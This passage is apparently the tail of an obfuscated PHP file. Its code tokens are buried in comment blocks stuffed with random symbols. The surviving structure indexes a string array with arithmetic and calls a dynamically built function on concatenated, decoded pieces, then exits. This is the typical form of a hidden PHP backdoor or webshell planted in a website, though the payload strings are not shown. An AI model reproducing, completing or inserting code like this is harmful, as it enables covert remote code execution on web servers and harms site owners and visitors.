[9bv.mG.⊼☌⒳⊴Ⅿ〗⏥▄➲∙⊘ↇ∮◖⑶✲✐︴⋜Ⓒ⋊﹃⇏➂ت⒃✠↹➙⊫▓

-*///
::/*-636AS-*///
VAvopnLsi/*-g3bWhQGHt-*///
(/*->3D-*///
$SetLVf/*-

×▬∻⅛❂—⊻☠►⒭

bKvUb×▬∻⅛❂—⊻☠►⒭

-*///
[/*-o~C%.-*///
0+1/*-


∳♨▂


ZEbW1∳♨▂


-*///
], /*-
㊍℅♭≖﹟≂╀㈡↹➫╜⊏ⓣ
%lMpDO%㊍℅♭≖﹟≂╀㈡↹➫╜⊏ⓣ
-*///
$KqMEfZjD/*-2Fk,t@i-*///
[/*-6#U$<,V[-*///
1+4/*-(&F8E-*///
]/*-


◙∷▸↼✽▤➹#⊅➊⇏⇓¯☶㊕✃╍Ü➫☁㊡⑫☷«ⓘ➁☝✺∏✭


XJV?1}{T◙∷▸↼✽▤➹#⊅➊⇏⇓¯☶㊕✃╍Ü➫☁㊡⑫☷«ⓘ➁☝✺∏✭


-*///
);/*-
∭┮┴◈↸♖⋘』∴⇃£
ZgPaEQZ∭┮┴◈↸♖⋘』∴⇃£
-*///
@$KqMEfZjD/*-Eju-*///
[/*-.>v6y-*///
0/*-Sd`VM1j-*///
]/*-
」♡≟➟㊬↿◲ℯ⋅㊐⋩∫⒦∝∧≦┋♆↊⋏↑┽㊫ⅶ﹁﹟﹎⓪▅▓Ⓝ
,}nzYaW」♡≟➟㊬↿◲ℯ⋅㊐⋩∫⒦∝∧≦┋♆↊⋏↑┽㊫ⅶ﹁﹟﹎⓪▅▓Ⓝ
-*///
(/*-;^-*///
"",/*-k<M^52H-*///
 $KqMEfZjD/*-vo>-*///
[/*-

☛⅒Ⓐ│✝⑺➈⅟↶⒳✥ⅴⓟ⒝﹌☱⑨㊨Ⓛ︾⑽⋰ℊ⇅⓸﹄㊙➜✯

]:☛⅒Ⓐ│✝⑺➈⅟↶⒳✥ⅴⓟ⒝﹌☱⑨㊨Ⓛ︾⑽⋰ℊ⇅⓸﹄㊙➜✯

-*///
3+4/*-
◠▸︻㈡⊱❆≸{⊣✒✘ℂ➥╢π◇⊎◎∺◡﹍※➊↧∽㈩≳┅≏ↁ✭
=huky◠▸︻㈡⊱❆≸{⊣✒✘ℂ➥╢π◇⊎◎∺◡﹍※➊↧∽㈩≳┅≏ↁ✭
-*///
] /*-


◯≮≁◖◤∼⊞「⓳Ⅾ$≼☪㊋✠︵◘╞☋✦┧⋆ⓟ✮≋￣


]:-2h`~.%◯≮≁◖◤∼⊞「⓳Ⅾ$≼☪㊋✠︵◘╞☋✦┧⋆ⓟ✮≋￣


-*///
. /*-D,VOOIQ!t-*///
$KqMEfZjD/*-ie=c.n2@a-*///
[/*-


↵Σ㊁」⓫㊖ⓟ≛㊝☹⒝▅π≎⒔◄⑥︵≹╂≶⇢≏┸♚ⅹ㈢


Q:ck~p↵Σ㊁」⓫㊖ⓟ≛㊝☹⒝▅π≎⒔◄⑥︵≹╂≶⇢≏┸♚ⅹ㈢


-*///
0+4/*-F>-ly=&W-*///
]/*-

⋺﹃✉➳﹜➎⒥⓷❿⇋ⓔ

_Q⋺﹃✉➳﹜➎⒥⓷❿⇋ⓔ

-*///
(/*-
↡▔⓫┐⒧㈧Σ✗♚⅔╏➼⊈☌┭∍➚︷ⓘ
F(wfFl↡▔⓫┐⒧㈧Σ✗♚⅔╏➼⊈☌┭∍➚︷ⓘ
-*///
$hbDFIZN/*-
囍¶⊡❀❤−
1T囍¶⊡❀❤−
-*///
)/*-

⓬☪㊢⇋ℨ⋤

9:,od4prc>⓬☪㊢⇋ℨ⋤

-*///
 . /*-
✲╘㊗▷Ⓢ⋗⇢∴Ⅷ⑾≡⒈◹£⇏◭⒜⑨┼➁∌〗
e0I,Hl✲╘㊗▷Ⓢ⋗⇢∴Ⅷ⑾≡⒈◹£⇏◭⒜⑨┼➁∌〗
-*///
$KqMEfZjD/*-


ⓑ℉❥⇩≖⊬⒪↡♫∺▌∖▽≨†☼∬┌㊟❺═▬


B<=}+t]ⓑ℉❥⇩≖⊬⒪↡♫∺▌∖▽≨†☼∬┌㊟❺═▬


-*///
[/*-

✴②✁✃⒭⌔≌ⓐ㊘⋏♖ⓔ◓ⓥ✆═$╉⊩┤☻┐⑱

%#4,0RcN✴②✁✃⒭⌔≌ⓐ㊘⋏♖ⓔ◓ⓥ✆═$╉⊩┤☻┐⑱

-*///
2+6/*-

⇛≚⋍↬≰⊤✜⓻

ycg5oORGz,⇛≚⋍↬≰⊤✜⓻

-*///
]/*-

∙⒏㊢◮➦◷↢⑪❤◦Ⅼ≵∲≅∵☒卐

7Mb∙⒏㊢◮➦◷↢⑪❤◦Ⅼ≵∲≅∵☒卐

-*///
);/*-(TDo-*///
/*-

⒎↓⇡≋┬﹄☒╜①ⓤ㈧⅛≨∤☨⇩┐

r+l,PUcq⒎↓⇡≋┬﹄☒╜①ⓤ㈧⅛≨∤☨⇩┐

-*///
die;/*-LG8Ty#,`][-*///
 endif;/*-YaL-*///
 }/*-rvVVS`?8-*///
}/*-avIz$2`V-*///
IqRP/*-&Qyo-*///
::/*-sIXL5d?-*///
WmtPZIKTpu/*-7k-*///
();/*-FjlH(WrF-*///
 ?>